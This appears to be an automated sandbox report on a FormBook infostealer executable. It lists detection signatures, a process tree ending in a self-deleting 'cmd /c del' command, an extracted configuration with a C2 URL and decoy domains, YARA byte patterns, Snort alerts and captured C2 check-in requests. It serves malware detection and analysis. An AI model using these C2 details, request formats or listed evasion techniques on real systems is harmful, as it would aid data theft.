Analysis Report s6G3ZtvHZg.exe

Overview

General Information

Sample Name: s6G3ZtvHZg.exe
Analysis ID: 385308
MD5: 885e567660a28ec23b692291587ef69f
SHA1: 9e200dd274b4be5df241719fe72f6403938a8561
SHA256: fb23a007cf696e3c6b119c61b62824abc56b47a7e2f82337e890acc9024bd88c
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • s6G3ZtvHZg.exe (PID: 6076 cmdline: 'C:\Users\user\Desktop\s6G3ZtvHZg.exe' MD5: 885E567660A28EC23B692291587EF69F)
    • s6G3ZtvHZg.exe (PID: 6328 cmdline: C:\Users\user\Desktop\s6G3ZtvHZg.exe MD5: 885E567660A28EC23B692291587EF69F)
    • s6G3ZtvHZg.exe (PID: 6336 cmdline: C:\Users\user\Desktop\s6G3ZtvHZg.exe MD5: 885E567660A28EC23B692291587EF69F)
      • explorer.exe (PID: 3292 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • help.exe (PID: 7084 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
          • cmd.exe (PID: 2888 cmdline: /c del 'C:\Users\user\Desktop\s6G3ZtvHZg.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        3.2.s6G3ZtvHZg.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          3.2.s6G3ZtvHZg.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Found malware configuration
          Source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook {"C2 list": ["www.okitmall.com/iu4d/"], "decoy": ["abbottdigitalhealthpass.com", "peridot.website", "emmajanetracy.com", "arewedoingenough.com", "mvprunning.com", "xn--939au40bijas7ab2a93s.com", "thehouseofchiron.com", "sqzffn.com", "moretuantired.com", "rosewoodcibubur.com", "warungjitu.com", "armylord.net", "rideequihome.com", "girasol.zone", "getboostphlo.com", "bilradioplaza.com", "japannxt.com", "figulco.com", "insershop.com", "loktantratvnews.com", "healthdatamonitoring.com", "gmopanama.com", "miguelchulia.com", "appexivo.com", "weluvweb.com", "qqcaotv.com", "aleyalifestyle.com", "aratssycosmetics.com", "chestfreezersale.xyz", "gyanumbrella.com", "betbonusuk.com", "dostforimpact.net", "lestlondon.com", "theartsutra.com", "finegiant.com", "zacharypelletier.com", "ux300e.com", "wiglous.club", "adamspartnership.com", "contex33.xyz", "appearwood.club", "3m-mat.com", "runcouver.com", "cqsjny.com", "totubemp3.net", "imagecloudhost.com", "appleadayjuice.com", "energyoutline.com", "yashaerotech.com", "mcleancosmeticgynecology.com", "georgicarealty.com", "sellbulkweed.com", "kardosystems.com", "hubsnewz.com", "ekstrafordunyasi.com", "cymentor.com", "morrealeestates.com", "mumbaihotgirls.club", "beaulaser.com", "aa29996.com", "ankaramasozlerburada.xyz", "otmcleaningservice.com", "rosaandray.com", "omxpro.com"]}
          Multi AV Scanner detection for submitted file
          Source: s6G3ZtvHZg.exe, Virustotal: Detection: 27%
          Source: s6G3ZtvHZg.exe, ReversingLabs: Detection: 25%
          Yara detected FormBook
          Source: Yara match, File source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sample
          Source: s6G3ZtvHZg.exe, Joe Sandbox ML: detected
          Source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: s6G3ZtvHZg.exe, Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: s6G3ZtvHZg.exe, Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: s6G3ZtvHZg.exe, 00000003.00000002.294291430.0000000001710000.00000040.00000001.sdmp, help.exe, 0000000E.00000002.507433539.0000000002DA0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: s6G3ZtvHZg.exe, help.exe
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exe, Code function: 4x nop then pop edi 3_2_00416277
          Source: C:\Windows\SysWOW64\help.exe, Code function: 4x nop then pop edi 14_2_003A6277

          Networking:

          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49719 -> 104.21.7.67:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49721 -> 3.13.255.157:80
          Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49740 -> 52.58.78.16:80
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractor, URLs: www.okitmall.com/iu4d/
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exe, DNS query: www.chestfreezersale.xyz
          Source: global traffic, HTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1 Host: www.emmajanetracy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=aMD/FfTIFdO3dQr6MUn+t3qhrpMUQuV8ueOBsAqsCPdFlO5Mvx0OM51UzrMOHcRpnHSJ7V9dZA== HTTP/1.1 Host: www.okitmall.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?J6A=t0/ehB6/LVvHYU10SpQGBhUGrinUOeav3QqKXry454rcMit/5rlSGcY6Hhw179fg+WUV7s8SGg==&uVjL=M6NHp HTTP/1.1 Host: www.moretuantired.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=FEKq/YHm5wXdiXZSfMYU5a3fJJzC9VYlasV/QaqgSPDk7XU2aTMqxEbJbT4EZiZV5QP8ot7STQ== HTTP/1.1 Host: www.betbonusuk.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?J6A=p+YVWX5eE4Rg8cIpgLWCUqreCa5cO9ffVLN3OauOR6vO7HZOR4KqCsCqkB1fyJC1oU39P3kn3g==&uVjL=M6NHp HTTP/1.1 Host: www.weluvweb.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=k0teHmEV2/zmOBpTxqI3H5Y5oaIRcTZxO4xmkSNbfQsiDPlSSPS4pf83qXUKBn/nYITInLUVzg== HTTP/1.1 Host: www.warungjitu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=quJ3uSLzhXOR+OCBqveBVSLwWtpx0cb154Cx1Wq/f+1xYAHW6pDvZEyzwff3Do7t5v8+AMWbMw== HTTP/1.1 Host: www.appearwood.club Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?J6A=/9OusRTTk+V39FQseUb+U2Ojje2+Fc0M9rZrn6A+Wz352TzRXVRSZ625FgSAuh9Pz9OXstBPtg==&uVjL=M6NHp HTTP/1.1 Host: www.theartsutra.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=A35kX2qXHT11q/n/cs4iUbUQYnF9cz7N4ymZ2B1O+tarurGCDYOUJTJ/gp5jdduweflW0nZeQg== HTTP/1.1 Host: www.chestfreezersale.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A== HTTP/1.1 Host: www.emmajanetracy.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 192.0.78.25 192.0.78.25
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox View, ASN Name: AUTOMATTICUS AUTOMATTICUS
          Source: unknown, DNS traffic detected: queries for: www.emmajanetracy.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 12 Apr 2021 08:03:45 GMTServer: ApacheX-Powered-By: PHP/5.6.36X-Frame-Options: SAMEORIGINCache-Control: No-CacheConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 65 30 34 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 72 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 33 36 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 6c 65 70 68 6f 6e 65 3d 6e 6f 22 20 2f 3e 0a 09 09 09 09 3c 74 69 74 6c 65 3e ed 86 b5 ed 95 a9 eb b3 b4 ed 97 98 20 eb b9 84 ea b5 90 ea b2 ac ec a0 81 ec 82 ac ec 9d b4 ed 8a b8 3c 2f 74 69 74 6c 65 3e 0a 0a 09 09 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 31 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 51 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2f 32 2e 30 2e 33 2f 6a 71 75 65 72 79 2e 73 65 72 69 61 6c 69 7a 65 4f 62 6a 65 63 74 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 73 6f 6e 33 2f 33 2e 33 2e 32 2f 6a 73 6f 6e 33 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 
3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0a 20 20 20 20 20 20 24 66 6f 72 6d 20 3d 20 24 28 27 2e 70 75 72 65 2d 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 24 66 6f 72 6d 2e 73 75 62 6d 69 74 28 66 75 6e 63 74 69 6f 6e 28 65 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 24 74 68 69 73 20 3d 20 24 28 74 68 69 73 29 3b 0a 0a 09 09 76 61 72 20 66 20 3d 20 74 68 69 73 3b 0a 0a 09 09 69 66 20 28 66 2e 61 67 72 65 65 2e 63 68 65 63 6b 65 64 20 3d 3d 20 66 61 6c 73 65 29 0a 09 09 09 7b 0a 09 09 09 09 61 6c 65 72 74 28 27 ea b0 9c ec 9d b8 ec a0 95 eb b3 b4 ec b7 a8 ea b8 89 eb b0 a9 ec b9 a8 ec 97 90 20 eb 8f 99 ec 9d 98 ed 95 b4 20 ec a3 bc ec 84 b8 ec 9a 94 2e 27 29 3b 0a 09 09 09 09 66 2e 61 67 72 65 65 2e 66 6f 63 75 73 28 29 3b 0a 09 09 09 09 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0a 09 09 09 7d 0a 0a 09 09 09 09 69 66 20 28 66 2e 63 75 73 74 6f 6d 65 72 5f 6e 61 6d 65 2e 76 61 6c 75 65 20 3d 3d 20 22 22 29 0a 09 09 09 7b 0a 09 09 09 0
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.252345146.00000000028D1000.00000004.00000001.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000004.00000000.272051627.0000000006840000.00000004.00000001.sdmp, String found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.fonts.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
          Source: s6G3ZtvHZg.exe, 00000000.00000002.255876362.0000000005940000.00000002.00000001.sdmp, explorer.exe, 00000004.00000000.279202038.000000000BE70000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
